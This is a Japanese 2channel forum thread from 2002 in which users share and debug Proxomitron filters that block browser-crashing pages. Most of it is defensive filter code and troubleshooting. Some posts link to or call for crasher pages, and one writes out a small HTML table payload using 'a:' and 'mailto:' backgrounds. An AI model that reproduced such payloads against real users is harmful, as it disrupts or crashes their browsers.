名前が変わったので廃棄してくださいね。
>>447 444さんではありませんが、Meta Characterが誤爆するので、報告です。
Kill Quoted Meta Character FALSE状態
<BODY bgcolor="#bad3fe" text="#003333" link="#0066ff" vlink="#669999" alink="#ffcc00" ProxAllow= "return false;" ><//--><//"--><!-- BEGIN PROBE CODE --><comment>
ちゃんとHPになってるんだけど、省略
<//--><//"--> </BODY>
Kill Quoted Meta Character ACTIVE状態
<BODY bgcolor="#bad3fe" text="#003333" link="#0066ff" vlink="#669999" alink="#ffcc00" ProxAllow= "return false;" >
<//--><font size=1 color=green>[Quoted Meta Character Found]</font> </BODY>
<//-->がある所為かな?と思うんですが。
>>449 あ、原因がわかりました。
Boundsを
< [a-z] [^"'`<>]++ ("*'[^"'`<>]+)++ >
に変えてください。([^!]を[a-z]に)
>>450 素早い対応ありがとうございます。
>>449 のあるHP、問題無く見れるようになりました。
画像があるのに×マークが出て表示されなかったり(オミトロンを切ると見れる)、
表示されてもなんて言うか乱れた画像になってしまうのは、どのフィルターが
影響してるんでしょうか?
デフォルト以外のフィルターは
>>437 のAnti Browser Crasherとか
Image CheckerとかProtocol src killerとかBanner Blaster Ver.Prox - J 3
等を入れてます。
>>452 画像があるのに×マークというのはYahoo以外のサイト?
画像が乱れるのはImage Checkerの二つ目のウェブフィルタを
いれてないからじゃないかな。画像のバイナリの一部がたまたま
ウェブフィルタにマッチした場合に起こるような。>乱れ
Kill Too Many Framesの誤爆かも知れないので報告します。
ttp://dhmwxu.virtualave.net/ このページですが、Kill Too Many Frames
で表示出来ない。Bypassでソース見たけど、frameが20以上含まれていないよう
に思えるんですが?
>>455 原因がわかったので修正しました。(3,211 Bytes)
>>456 は間違えてました。修正版のサイズは3,227bytesです。
>>459 お疲れさまです。HPが見れていたんで、誤爆の修正は完了と思っていたん
ですが、他の不具合が合ったんですね。早速、入れ換えました。
>>461 修正してみましたが、どうでしょうか? (3,246 Bytes)
463 :
461 :02/01/05 19:35 ID:???
>>462 バッチリです!ほんとに素早い対応ありがとうございます!
464 :
名無しさん@お腹いっぱい。 :02/01/06 03:26 ID:sYPTMZsM
465 :
464 :02/01/06 03:30 ID:???
↑ アンチウイルス常駐でみてください
467 :
464 :02/01/06 18:50 ID:???
>>466 スイマセン勘違いしていました。
すべて防げていました。
468 :
名無しさん@お腹いっぱい。 :02/01/07 07:50 ID:XBdFUk3/
オミトロンさしてゾヌブラウザ使うとレスが取得できない。 MDIでは大丈夫なんだけど。イミネー。 誰か理由わかる人おしえて。ヒントだけでも。
Image Checker(計2つ)を抜いても画像が乱れる。 Anti Browser Crasher(計7つ)のフィルターも 画像になんか影響するのかな?
471 :
468 :02/01/07 14:49 ID:AgVi6ntv
ホットゾヌのことですスレ違いゴメン。 そっち行ってみます。 レスサンキュー!
474 :
473 :02/01/07 16:20 ID:???
フィルターを入れたり消したりとか、オミトロンのログウィンドウで 確認した所、Kill Quoted Meta Character (2002/01/05)が影響 してるみたいです。画像の乱れにImage Checker(計2つ)は関与して ないようです。
>>474 >>470 ヘッダフィルタをあわせると計3つではないかと。
Image Checkerにはウェブフィルタだけでなくヘッダフィルタもありますよね?
そっちを有効にしている場合は、拡張子が画像をあらわしているものを
すべてHTMLとみなしてすべての有効なウェブフィルタを適用させていきます。
なので、画像のバイナリの中にウェブフィルタとマッチしてしまうパターンが
含まれていたということじゃないかな。
もしImage Checkerフィルタの2つ目のウェブフィルタを無効にしたんだったら
Image Checkerに含まれるヘッダフィルタのほうも同時に無効にするべきです。
Image Checkerの2つ目のウェブフィルタは、そのフィルタより下にある
ウェブフィルタがマッチすることがないように、すべてのパターンにマッチ
するようになっています。
Image Checkerを無効にするときにはヘッダフィルタのほうも無効にするのを
わすれないようにすればいいと思います。
s/ウェブフィルタ/ウェブページフィルタ/g でした。すんません。
477 :
473 :02/01/07 17:32 ID:???
>>475 Image Checkerのheaderの方を無効にしたら上手くいきました。
ありがとう御座います。感謝!
話題になっているImage Checkerですが、 Image Checker [P] [08.07.2001] Image Checker After の二つを入れていますが、これだけではダメでしょうか? 因みに>473は、 Naoko4.1+上記+Anti_Browser_Crasher(最新)+他少し で問題ないです。
>>478 >>103 のURL: Filter image extensionフィルタは入れてますか?
いれてないとImage Checkerの意味がないですよ。
Image Checker[P]とImage Checker Afterには Allow〜にチェック付けなくていいんですよね?
>>480 はい。
とくにImage Checker Afterを複数のフィルタがマッチするように
したりしたらそのフィルタの存在意義が。。
ところで、フィルタのならびは、Image Checkerは一番上に、
次にほかのブラクラ対策フィルタ、つぎに自分で
作った(マージした)フィルタ、次に2ちゃん系フィルタ、
最後にデフォルトのフィルタ、という順番にするのが、
ブラクラ対策と一般のページのブラウズに一番不具合が
なくて、それぞれのフィルタの効果がある並べ方だと
思っています。どうでしょう?
>>481 今まで適当に並べてました(笑
Image Checker(計2つ)→Anti Browser Crusher(計7つ)
→Protocol src killer→Banner Blaster Ver.Prox - J 3
→デフォルトのフィルターと言う順番に変えました。
ブラクラ対策にはLocal Files Access Killerも入れた方がいいですかね?
よくよく考えてみると、ヘッダフィルターの URL: Filter image extensionを無効にしてしまうと 画像系拡張子に対するブラクラ対策の意味がなくなってしまう ような・・・
>>482 Protocol src killerとLocal Files Access Killerは
Kill Unexpected Protocolフィルタに含まれていますね。
(
>>408 参照)
>>483 そうです。なので、Image Checkerを使う場合は3つのフィルタすべてを
有効にしないといけないですね。(3つすべて必要です)
>>484 に補足しますと、
Image Checkerのそれぞれのフィルタの役割は、
URL: Filter image extension
拡張子がjpg, jpeg, gif, png, bmpの場合、強制的にフィルタリングさせます。
IEがHTTPヘッダにContent-Type: image/*が送られてきてもHTMLだった場合に
おせっかいにもContent-Type: text/htmlとして処理することが原因。
Image Checker
HTMLに特徴的なパターンが見つかったら警告する。
Image Checker After
Image Checkerにマッチしなかったら、これ以降のフィルタがマッチしないように
すべての文字列をマッチさせる。
という感じです。(間違っていたら訂正きぼー>識者)
>>485 いろいろありがとうです。ちょっと勉強になりました。
さっきオミトロンのサイトへ行ってみたら2日前に 新しいヴァージョンが出てるんですね、今気が付きました。 >1/5/2002: New version! Proxomitron 4.1 本文を翻訳ソフトで読んでみると、重大なバグを 修正したとか書いてあるけど、どこがどう変わったんだか 自分には分からないです(笑
>>488 3,930 Bytesです。日付を間違えてました。。
4.1でAnti_Browser_Crasher.zipが効きません… Anti Auto Refresherが効いてしまう… 鬱だ…
>>488 Filter image extension,Image Checker,Image Checker Afterが
不要になるって事でしょうか?
>>490 ですが、
* NOTE! Altered $URL() command to include protocol (i.e.
http:// )
Makes it possible to check for now, but you may have to adjust
existing filters!
を見逃してました。
「$URL(」をすべて「$URL(
http:// 」に置き換えたら大部分は
まともに動くようになりました。
>>491 具体的にはどのブラクラでしょうか?
>>493 たぶん、なくても大丈夫だと思うんですが、、
>>495 レスありがとうございます。チェック外して様子見てみます。
Filter image extension,Image Checker,Image Checker After入れてると、
100%画像化けるページあったんだけど、入れ換えたら、化けなくなってる。
ちなみに、このページの画像の一部が化けてた。
ttp://www.kt70.com/~okame/
498 :
491 :02/01/08 00:59 ID:???
>>499 のは、化けっていうより、バイナリをテキスト表示しているんで、化けと
は一寸違うような…(^^;)。
さて、寝る。
501 :
498 :02/01/08 01:17 ID:???
>>501 私は出ませんねー。>16メロの広告
$URL()の書き換えはしましたか?
>$URL()の書き換えはしましたか? これは具体的にはどうやればいいんですか?
507 :
501 :02/01/08 02:14 ID:???
みなさん 色々とレスありがとうございます。 Anti Browser Crasherは、Add LinkのHeader Filtersが原因でした… Add Link 3.4までの分ですが… 広告の方は、書き換えで出来ました… 有り難うございました。_(__)_
ヴァージョン4.1についてですが、4.1に最初から入ってる デフォルトのフィルターについては特に自分で変更する必要は ないんですよね?
>>509 4.1のDefault.cfgで$URLが使われているのは、Content-Type: Fix MIME
types (In)だけですね。俺は書き換えなかったよ。このフィルターは。
多分、いいんじゃないかなと思います。
511 :
509 :02/01/08 18:26 ID:???
513 :
名無しさん@お腹いっぱい。 :02/01/08 20:18 ID:6WhU/EFE
>>512 HTML Content Found!
Proxomitronの設定でHTTPのポートは何番を使ってますか? デフォルトでは8080ですが、とあるサイトにProxomitronの ポート設定についてこんな記述がありました。 >Proxomitronには不特定の人物からのアクセスを拒否する機能が >ありますが、どんなセキュリティホールがあるか分かりませんので、 >デフォルトポート番号8080を適当なポート番号に変更することをオススメします。 これを読んで8080から他のポートに変えたんですが、どうなんですかね? ネット上にあるポート一覧を見て、割り当ての無いポートを適当に入れました。
セキュリティ重視(ブラクラ)の場合、Image CheckerとAnti Browser Crusher を入れてれば、大丈夫ですか?他にこれも入れとけって言うフィルターがあったら 教えて下さい。
>>515 うちもImage Checker [P] [08.07.2001]入れてるのに食らった。
一番上に持ってきてるのになんでだろ
519 :
513 :02/01/08 23:48 ID:???
>>518 俺の場合、一度image checker無効で食らって、
有効にしてからCtrl+リロードしても食らうんで、おかしいな
と思っていたんだけど、IEのキャッシュクリアしたら、防げた。
ちなみに、Content-Length: always filter (In)と
Kill Loop JavaScript (2002/01/06)でも防げたよ。
>>516 私も前にそのサイト読んだよ。ハンニバルだっけなんだっけ。
このPCからのアクセスのみ許可する、にしてあるしデフォでいいんじゃないかな?
それでも危険なんだろうか。だったら変えるけど、
8080以外のポートにして不具合起こっていませんか?
教えてください。
>>521 俺もポート変えてます。8080でも問題ないと思うけど
一応念には念を入れるって意味で。特に不具合は無いですよ。
523 :
名無しさん@お腹いっぱい。 :02/01/09 00:29 ID:TA+aXj56
Proxomitronをさっき始めてインストールしたんだけどさ なんかずっと8080で接続待ち中ってなってるんだけどこーゆーもんなの?
>>516 ポートを変える意味はあんまりないと思うな。
ほんとにセキュリティホールを狙ってるやつの場合は
ポートを特定して狙うわけじゃなくて
1から65535までのすべてのポートを調べてくるだろうし。
>>523 おそらくブラウザでプロクシの設定をしてないのでは?
localhost:8080を使うようにしないとProxomitronを経由しないよ。
ていうかとりあえずProxomitron-Jの説明書を読んだほうがいいね。
528 :
名無しさん@お腹いっぱい。 :02/01/09 05:19 ID:5kNLMGTU
しつもーん gzip圧縮されたブラクラにはどうやってProxomitronで対抗するの?
gzipで圧縮して仕返し
>>532 Anti_Browser_Crasher.zip (4,167 Bytes)はImage Checkerも含んでるから
Image Checkerはいらないんですよね?
535 :
530 :02/01/09 22:24 ID:???
>>531 Anti_Browser_Crasher.zipの最新版をいれたら防いでくれてますね。
>>532 いつもフィルター使わせてもらってます、どうも有り難う。
>>534 あー、やばいっすねー。。HTMLにはまったく問題ないです。
ISO-2022-JPだと<とか>と同じコードがふつーに使われてるんですね。。
ESC $ BからESC ( Bまでの間は<とか>が含まれていても無視するように
しないといけないのかも。
あと、JavaScriptのコードに含まれる場合も考えないといけないですね。。
ちょっと考えてみます。
>>537 一応修正しました。(4,259 Bytes)
ただし、文字セットがISO-2022-JPのページでは
Escape/Kill Quoted Meta Characterはほとんど意味を
なさなくなってしまいました。
根本的な解決を目指すならば、Proxomitronの側で文字セットも
考慮してJIS-X-0208を使ってる間は>とか<とか"を認識しないように
してもらえるといいのですが、英語圏のソフトウェアだから
そういうふうな仕様に改良してもらうのはたぶん無理でしょうね。。
デフォルトのフィルターを使っているときでもたまに誤爆しまくっていて、
デバッグモードでみるとえらく文字化けしていたのは文字セットに
ISO-2022-JPを使ってるページだったからなんだろうなぁ。
もうちょっといい方法がないか考えてみます。
あ、フィルタの書き方が間違ってました。。 4,280バイトのやつが修正版です。
>>528 Proxomitronがgzipに対応してるから問題ないのでは?
webサーバがgzip圧縮 -> ファイル転送 ->
Proxomitronがファイルを展開 -> HTMLを解析、
という流れだと思うんだけど。
例えば落としたそのままのデフォルト設定でもgzipには対応してますか?
Accept-encoding: Allow webpage encoding (out)が有効になっていれば大丈夫です。
もう強力なブラクラ無いの?それともオミトロンが強くなり過ぎたのかな? Anti_Browser_Crasherを打ち破るブラクラ募集!
545 :
名無しさん@お腹いっぱい。 :02/01/11 00:56 ID:/FJTlgLi
イキのいいブラクラさ、いねえが〜?
546 :
名無しさん@お腹いっぱい。 :02/01/11 01:55 ID:W9seZbeU
ブラクラ〜〜♪
最近のブラクラは根性がないな(p
549 :
名無しさん@お腹いっぱい。 :02/01/11 10:00 ID:d8R2LDFx
いまどきconconやmailto貼られるとムカつく。 こっちがせっかく重装備して待っているというのに何だあのヘタレは。
Window板にも出てる話題だけど、オミトロンの優先度を下げたら 何かスムーズ。今まではオミトロンで解析が終わってからIEで一気に 表示って感じだったけど、優先度を下げたらとてもスムーズ。 これはいい。
>>550 ごめん。その優先度の下げ方ってどうするの?教えて下さい。
>>552 あ、ありがと。そーゆーソフトがあったのね。
うちは優先度上げたほうが良かったよ 解析が短時間で済むし 自分だけかもしれないが優先度下げたらフィルターが通らない事があった。
うちも優先度を上げたほうが良かった 壊れたイメージが表示されることがなくなった
オミトロンの優先度の上げ下げやってみた。 上げるとパッと解析して、パッと表示(設定は高) 下げると解析しつつ表示するって感じ(設定は低) どっちがいいかは好みかな、下げるとフィルター が通らないって言う現象は確認出来なかったけど、 どうなんだろ。
その優先度変更ってProsess++でも可?
>>557 問題無いと思われ。
しかし、スレ内容が変わってきたね。ソ板のPart4スレとか、Win板のPart7スレ
で話す方がいいんじゃないか?
ちょっとスレ違い的になって来たけど、肝心のオミトロンで防げないような ブラクラも出て来ないし、Anti_Browser_Crasherもかなり進化したし このスレの目的も達成された感も無くは無いって感じ。
今の流行はブラクラよりウィルス
>>561 よく分からんが、無くなってるみたいよ?
>>563 今見たけど、壊れないようですが?
Content-Length: always filter (In)をHTTP headersに入れてる?
565 :
563 :02/01/15 22:25 ID:???
>>564 Content-Length: always filter (In)は入れてます。
ログみたら、 Escape Quoted Meta Character (2002/01/09)にMatchして
画像の真ん中あたりがグチャッと壊れます。
バイパスするとちゃんと表示されるんです。
>>565 出口の表示の側の5人の左から2、3の部分か。見逃してた。確かに一部、
化けてますね。
FilterImageExtension、ImageChecker,ImageCheckerAfterの組み合わせだと
大丈夫みたいですね。
567 :
563 :02/01/15 23:57 ID:???
>>566 ImageCheckerだと大丈夫なんですね。
とりあえずImageChecker使っときます。
Restore Contents Except Text が効かないのは何故だろう?
今まで何でもなかったのに,今日からおかしくなった。 なんか2ちゃんの左側のフレームの板名をクリックしても表示されないのは オミトロンのせいじゃないよね?
>>570 ありがとう、デバックモードで見てみたけどマッチしたフィルターが
1個も無かった。それでIEのセキュリティの設定を確認してみたら
"異なるドメイン間のサブフレームの移動"と言う項目が無効だと駄目みたい。
いつもIEのセキュリティは高で使ってて、上の項目は高だと無効になってるんだけど
昨日まではそれで見れた。なんか変わったのかなぁ〜
572 :
571 :02/01/16 15:11 ID:???
変わったと言えば、書き込むのにいちいち"書き込み確認" してくるようになった。なんだかなぁ〜
test
>>572 それ対策のヘッダフィルタを作ってみました。
[HTTP headers]
In = FALSE
Out = TRUE
Key = "Cookie: 2ch fake a cookie (out)"
URL = "*.(2ch.net|bbspink.com)/"
Replace = "NAME=; path=/"
578 :
名無しさん@お腹いっぱい。 :02/01/16 16:06 ID:I5gXS04o
Protect Contents Except HTML (2002/01/16) にしてから何かおかしいのです。 Protect〜の仕掛けがわからないのですが、 例えば↓が効かなくなります。 Name = "BODY bgcolor replacer" Active = TRUE Multi = TRUE Bounds = "<body*>" Limit = 1100 Match = "\1 bgcolor=\w \2" Replace = "\1 bgcolor="#C0C0C0" \2"
テスト
test
フガーフガ
>>568 崩れてるのは私だけでしょうか?以前とは違い、
画像の下半分が崩れてしまっています。
584 :
名無しさん@お腹いっぱい。 :02/01/16 23:20 ID:0QEjyZfV
俺も
>>568 入れ直してから画像が壊れるようになった。
Protect Contents Except HTML (2002/01/16)
切ると正常なんです。
585 :
名無しさん@お腹いっぱい。 :02/01/17 01:18 ID:YEfV4T39
587 :
585 :02/01/17 01:37 ID:???
対応ありがとうございます。 ですが、変わりなしです。 Image Checkerは入れなくても良いんですよね?
>>587 はい。12個のフィルタのうちのalways filterとProtect Contentsのみが
関係してます。ログウィンドウの表示とかどうなりますか?
Ctrl押しながらリロードとかキャッシュを削除してもそうなりますか?
589 :
585 :02/01/17 01:51 ID:???
>>589 13行出てくるということは、ちゃんと効いてるみたいですね。
フィルタの順番も一番上にしてますよね?
こちらでは画像が壊れないんで、ちょっとN40に戻してみます。
あ、壊れました。>N40 なんでだろう。。 N41で壊れてしまう方はいますか? とりあえず、こちらの環境ではN41で壊れることはないので これを機会に移行するのがいいかも。
592 :
585 :02/01/17 02:10 ID:???
>>591 そうでしたか。N41にしてみます。
お手数かけました。
594 :
585 :02/01/17 02:25 ID:???
>>586 +N41で正常に表示されました。
ありがとうございました。
595 :
:02/01/17 03:39 ID:???
596 :
578 :02/01/17 09:13 ID:???
Protect Contents Except HTML (2002/01/17) で改善されました。
Protect Contents Except HTMLですが、
" <a href="
http:// (prefix)bweb..\h\p">\n"
の部分を
" <a href="
http:// (prefix)bweb..src..\h\p">\n"
に書き直しておいてください。(prefix)も適当な文字列に。
でないと、せっかくブラクラを回避したのに意味ないです。。
>>597 適当な文字列と言われてもよくわかりません。
作者さんが正式訂正を書いてください。
(presex)でもいいんじゃないの?
>>600 ですね。あと、ブラクラを回避することはできるので、
書き換えずにそのままにしていても、意味がないわけではないです。
書き換えずにいたらソースが見られねえのですね。
603 :
名無しさん@お腹いっぱい。 :02/01/17 17:32 ID:BrlOMbjV
Protect Contents Except HTMLの
" <a href="
http:// (prefix)bweb..\h\p">\n"の(prefix)を
自分にあった物に直すのはわかったのですが、( )もつけるんですか?
>>607 たぶん要らないと思う。
例えばprefixを chinpo- にしたら chinpo-bweb..
でよいんじゃないかなあ。
あんまりよく分かっていないのですが。
610 :
607 :02/01/17 23:40 ID:???
>>608-609 どうもありがとうございます。これで心おきなくブラクラが踏めます。
どうもでした。
>>607 " <a href="
http:// (prefix)bweb..\h\p">\n"じゃなくて
" <a href="
http:// (prefix)bweb..src..\h\p">\n"だからね。
612 :
607 :02/01/17 23:49 ID:???
613 :
598 :02/01/17 23:54 ID:???
>>600 読みましたが全くよくわかりません。
自分に合ったものってどういうことですか?
作者さんが決めてくれるほうが助かるのに。
614 :
603 :02/01/17 23:56 ID:BrlOMbjV
>>604 早速の修正版、ありがとうございました〜。正常動作、確認しました!
今後もよろしく( ´∀`)
>>613 わからない場合はそのままでもとくに支障はないですよ。
もっと便利に使いたい(ブラクラのソースが見たい)ひとは、プレフィクスを
設定したほうがいい、ということです。
>>613 Prefixは、パスワードと同じと思って下さい。パスワードが決まってい
たら、悪用される。
>>600 のリンク先の「URL コマンドのセキュリティ」をじっ
くり読めば分かると思うんだが…。
617 :
598 :02/01/18 14:24 ID:???
>>615 そのままでいいんですね。でも変えろって人もいるし変。
ところで作者さんなんですか?
トリップつけてください。
>>616 頭が悪いので読んでもわかりません。
文字はABCDEでもいいってことなんですか?
\xでいいんでは?prefix
ブラウジングがかなり重くなったような…。 tocさんのフィルタと重複してる機能の既存フィルタとかあるんだろうか。 誰か詳し人に教えて欲しいな。
620 :
600 :02/01/18 16:24 ID:???
>613 Proxomitronの設定ボタンクリック プリファランスダイアログのアクセスタブをクリック 下の方「全てのURLコマンド云云」で アナタが設定した接頭語を (prefix) に変更するってことです おそらく598は何も設定してないんだろ?
621 :
600 :02/01/18 16:28 ID:???
>620 > アナタが設定した接頭語を (prefix) に変更するってことです 誤解する書き方だね(゚д゚)マズー もし、Proxomitronで接頭語を hoge にしていたら (prefix) は hoge に書き直しなさいってことだよ
>>613 君の好きな女の子か男の子の名前にしたらいいよ。
オミトロンツカイニ、ドリョクヲワスレタチュウボウハ、イラナイ。 オミトロンツカイニ、タリキホンガンバカリノチュウボウハ、イラナイ。 ココノミナサンハ、ガマンヅヨイカタバカリデスネ。
>>623 君の憎む厨房の撲滅ために、粋なブラクラでも紹介してくれないかね?
584〜を読んだけど 画像が壊れる対策はN41にするしかないってことですか? 大変になるな・・・。
626 :
名無しさん@お腹いっぱい。 :02/01/19 03:38 ID:UXAxMDLT
うちはImage Checkerのままですが、Anti_Browser_Crasherに
変えたほうがいいんでしょうかね?
ちなみにImage Checkerは自力でカスタマイズして
>>530 ブロック成功&ソース表示
>>568 ブロック成功&ソース表示
>>585 正常
>>589 正常
>>603 正常
でしたけど。。
627 :
618 :02/01/19 07:01 ID:???
フィルタに書くPrefixは始めから\xの置換コマンドにしておけば いいと思うんだけど・・・違うの?
>>618 気が付かなかったヨ
Replacement Text Escapes
\x Insert URL command prefix if defined.
いつの間にか増えていたんですね。
やっぱりたまには純正のヘルプも見ないと駄目だな。
631 :
600 :02/01/19 11:51 ID:???
>625 Anti_Browser_Crasherを作る作者もアナタ以上に大変なんだよ
もう話題無いかもしれないけど良スレあげ
634 :
名無しさん@お腹いっぱい。 :02/01/22 00:05 ID:uuutVnRJ
tocキャップつけろ
まだまだ、ま〜だまだ、新しいブラクラは出てくるはずです。
>>634 キャップにこだわる必要あるのか?別になくてもいいんじゃない?
最近ほんとにブラクラ見ないねぇー ところでalways filterを使うとバイナリに対しても パターンマッチが行なえるけど、それを利用すれば 簡易ウィルスチェックもできるかも?
639 :
名無しさん@お腹いっぱい。 :02/01/23 22:04 ID:CXFBCbTj
642 :
特攻隊員 :02/01/24 17:06 ID:IBcNb29b
隊長、無事帰還しました!! 特に目新しいものは有りませんでした! オオミトロンマンセー!!
>640 糞ブラクラウザイ
646 :
要望 :02/01/24 22:52 ID:???
Anti_Browser_Crasher.zipの近くに 最新更新日を書いておいてくれませんか?
質問なんですが 貧弱なマシンなのでオミトロンの無駄な部分は削りたいのですが tocさんの13個のブラクラ対策フィルタって2chではいらないんでしょうか? もしいらないなら、それらのULRマッチに ^([^.]+.(2ch.net|bbspink.com)/) と入れたらオミトロンは少しは高速化するんでしょうか? 質問ばかりですみません。
648 :
名無しさん@お腹いっぱい。 :02/01/24 23:20 ID:i4FOhw6I
>>647 2ちゃんねる本体にブラクラが存在することはありえない
のでそれでよいと思います。(^[^.]+.(2ch.net|bbspink.com))
>>648 まぁまぁ。マターリと行きましょう。
>>648 誰が決めた?
自分の物差しで語るなよど阿呆
お前のものさしは亀頭
ここは優良スレだと思ったが、雲行きが怪しくなってきた。 もうブラクラも無くなってきたし、そろそろ終わりかな。 (こんだけブラクラ貼っといて、優良とは言えないか…)
653 :
名無しさん@お腹いっぱい。 :02/01/25 04:42 ID:X7VJx7Xt
>>652 学術書によるエロスの探求がエロくないのと同じで、ここはブラクラへのリンクが
あるけども「優良」スレでしょう(笑)。
ProxomitronのFreeze GIF Animationにチェックを入れてるけど、 全然効いてなくない?全然意味なし。強力なGIF Animationを殺す フィルターないかのぅ
655 :
:02/01/25 11:59 ID:???
>>654 俺もなぜか効かない。
IEのオプション>詳細の
Webページのアニメーションを再生するをオフ
じゃダメなの?
IEの詳細設定の所(アニメーションを再生しない)にしても、 2ちゃんの"ハイクオリティ16和音"の広告の真ん中にある 4つの音符が上下に動く奴は止まんないんだね。 これはGIFじゃないのか・・・?
658 :
:02/01/25 13:07 ID:???
>>657 <marquee DIRECTION=DOWN SCROLLAMOUNT=3 height=16 width=19>♪</marquee>
661 :
名無しさん@お腹いっぱい。 :02/01/25 19:25 ID:VsQrfKdh
!!ブラクラ 緊急大募集!! このスレの住人はブラクラに餓えています。 我こそは!と思う厨房or高スキルな方 その腕と頭脳でオミトロンと闘ってみませんか? 見事オミトロンを打ち破った方には、 "Proxomitron Killer -オミトロンを倒せし者-" の称号が与えられることでしょう。 あなたの参加を心よりお待ちしています! 〜キミの一書きが、このスレの明日を創る!!〜 ※注 精神的ブラクラは対象外です。
>>662 それでこそ、ブラクラでProxomitronに対抗するスレだ!!!
>※注 精神的ブラクラは対象外です。
一応、
>>184 で「GROYA」を紹介済み。
ここはProxomitronスレ。
666 :
名無しさん@お腹いっぱい。 :02/01/26 18:32 ID:OC32FXG9
<Table border> <TR> <TH BACKGROUND="a:hoge1.jpg">ブ</TH> <TH BACKGROUND="a:hoge2.jpg">ラ</TH> <TH BACKGROUND="a:hoge3.jpg">ク</TH> <TH BACKGROUND="a:hoge4.jpg">ラ</TH> </TR> <TR> <TH BACKGROUND="mailto:hoge1">ぶ</TH> <TH BACKGROUND="mailto:hoge2">ら</TH> <TH BACKGROUND="mailto:hoge3">く</TH> <TH BACKGROUND="mailto:hoge4">ら</TH> </TR> </Table> これって対策済みだっけ?
>>663 「で」と「に」が逆です。
オミトロンでブラクラに対抗するんです(笑)
668 :
名無しさん@お腹いっぱい。 :02/01/27 20:04 ID:IlP8JGDD
639のやつはなんとかならないものでしょうか?
670 :
600 :02/01/27 22:16 ID:???
671 :
668 :02/01/27 23:01 ID:U4YwN3Xk
>>669 どんなフィルタで防げるのでしょうか?一応アンチブラクラのやつは一通り入れてるんですが。
>>669 のを踏むと変な女の顔が一定の間隔で出てくるのか?
踏んでみたが、なんも起こらん。中国語をインストールするか
メッセージと(当然キャンセル)なんかjpgを落としてるみたいだったが
なんも表示されない。
674 :
名無しさん@お腹いっぱい。 :02/01/28 02:03 ID:iv4TmmRD
>>671 とりあえずfullscreenはウザいので殺す。。
Name = "Fullscreen_yes killer"
Active = TRUE
Multi = TRUE
Limit = 256
Match = "(window.open|open|MM_openBrWindow)\9 \( \1 fullscreen = ("yes"|'yes'|yes) \3 \)"
Replace = "\9 \( \1 fullscreen_yes_killed_by_proxomitron \3 \)"
>>673 modokaだったらシスマソテク認定のウィルスだぞ
677 :
. :02/01/28 23:43 ID:AvA7wmAu
マルチになるかもしれませんが、
http://www.hotwired.co.jp/news/ に逝くとNIS2002のsymproxysvc.exeがフル稼働になりCPU100%になります
対処療法は、一旦Proxomitronを終了されることなのですが、
ホントもうブラクラですわ
Proxomitronのフィルタで防御することはできませんでしょうか?
681 :
680 :02/01/29 17:37 ID:???
> 対処療法は、一旦Proxomitronを終了されることなのですが、 スマソ s/終了される/終了させる/
adlistにそのURL入れれば大丈夫 見れなくなるけど
>>680 再現しませんね。
使ってるフィルタが関係するのかな?
684 :
消えないうちに :02/01/29 20:53 ID:B4xjG1yK
>>684 ブラウザは落ちないけど、ひどいねこれ。
>>684 確かにメーラ立ちあがるし重いね・・・。
689 :
684 :02/01/30 02:23 ID:Xrt6UT9f
あ、なるほど。 ページ全体がmailto:になってるから 多分気付かないうちにページを一回くらいクリックしてしまって それでメーラーが立ち上がったんだね。 mailto:を自分からクリックしてメーラーが立ち上がらないようにするのは できないのかなあ。 こういうクソ表示されたページを読み込まないようにはできないのかなあ。
690 :
名無しさん@お腹いっぱい。 :02/01/30 02:27 ID:XmqR5Bvy
http://village.infoweb.ne.jp/~ayumi/ayu.bbs/petit.cgi うちは何にもおこらなかったので調べたら自作の2つが効いてるっぽい。
大昔に作ったのでどういう経緯でこんな風になったのか分からないけど。
Name = "Stop Fuckin OnMouseOver events"
Active = TRUE
Multi = TRUE
Bounds = "(onmouseover|onMouseOut|onMouseMove)\2 = \"\3\" \4 >"
Limit = 128
Match = "*(for\(|while\(|AddFavorite\(|location.href\(|alert\(|window.open\(|open\()*"
Replace = "><table border=1><tr><td>\2 killed by proxomitron</td></tr><tr><td><pre>"\3"</pre></td></tr></table>"
Name = "Mailto Killer"
Active = TRUE
Multi = TRUE
Bounds = "<[^>]++href=*>"
Limit = 512
Match = "<[^L][^>]++href=("|)mailto:\1[ >"']*"
Replace = "[mailto \1]"
すげぇ 『タグでめちゃめちゃ荒らされてる掲示板』 から 「厨房が暴れている掲示板」 になった
692 :
名無しさん@お腹いっぱい。 :02/01/30 16:13 ID:Xrt6UT9f
693 :
680 :02/01/30 16:50 ID:???
>692 たとえば URL = "(^$LST(Non_Mailto_Killer))" のような一行を加えて Listsフォルダにファイルを作り、こまるURLを片っ端から追加していくとか
Operaだと普通に表示されるみたい。
695 :
名無しさん@お腹いっぱい。 :02/01/31 01:10 ID:hTggu5+h
IP抜きそのものははプラクラと関係無いけど、[protocol src]が7つひっかかってるね。 ブラクラも兼ねてるのかな?
>>695-696 それ以前に「Too Many Frames Killed」って言われた(w
698 :
user :02/01/31 17:14 ID:/VBSZFkd
>>608 昨日あたりから繋がらないよ<tocさんのとこ
繋がらない
>>701 tocさんのサイトってホント見やすいです。
いつもありがとうございます。
703 :
名無しさん@お腹いっぱい。 :02/02/02 17:53 ID:kvBKzKtH
>>701 消滅じゃなくてよかった〜
再インストールした時にフィルタ保存し忘れてて、消しちゃったんですよ。
気長に待ってますです。
704 :
名無しさん@お腹いっぱい。 :02/02/02 18:58 ID:Ip7QFp91
Image Checkerとはなんでしょうか??
画像をチェックするんだよ
>>706 おつかれさまです。フィルター使わせてもらって感謝しとります。
HDDの調達がんばってくださいね(はぁと
708 :
名無しさん@お腹いっぱい。 :02/02/08 11:19 ID:UhB0EMGn
相談です。 ブラクラっつーほどのこともないのですが Opera6.01J で、 ><META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET="shift_jis"> こんな記述があると、Opera がフリーズしてしまいます。 どうも shift_jis の前の 「"」が余計で、content=の属性値?が閉じられちゃうのが 原因らしいのですが、これを回避できないもんでしょうか? 皆様のお知恵を拝借したく、よろしくお願いいたします。
>>708 Match="<META*>
Relpace=""
当然違う場所に"があっても良くないんだよね。 んじゃやっぱブラウザの自動判別に任せるってもんじゃない? Match = "<meta http-equiv=AV(Content-Type)*>" Replace = "$STOP()"
あげ
712 :
名無しさん@お腹いっぱい。 :02/02/13 19:37 ID:q99Y4fCa
さがってたage
714 :
通行人さん@無名タレント :02/02/16 14:40 ID:AgSjVkX1
>>714 普通にふせげるじゃん。
Kill Too Many Frames (2002/01/05)
これで
http//homepage2.nifty.com/superpage/opai.gif
717 :
名無しさん@お腹いっぱい。 :02/02/16 22:28 ID:AgSjVkX1
>>715 なんか Allow for frame resizing と相性が悪いようで、
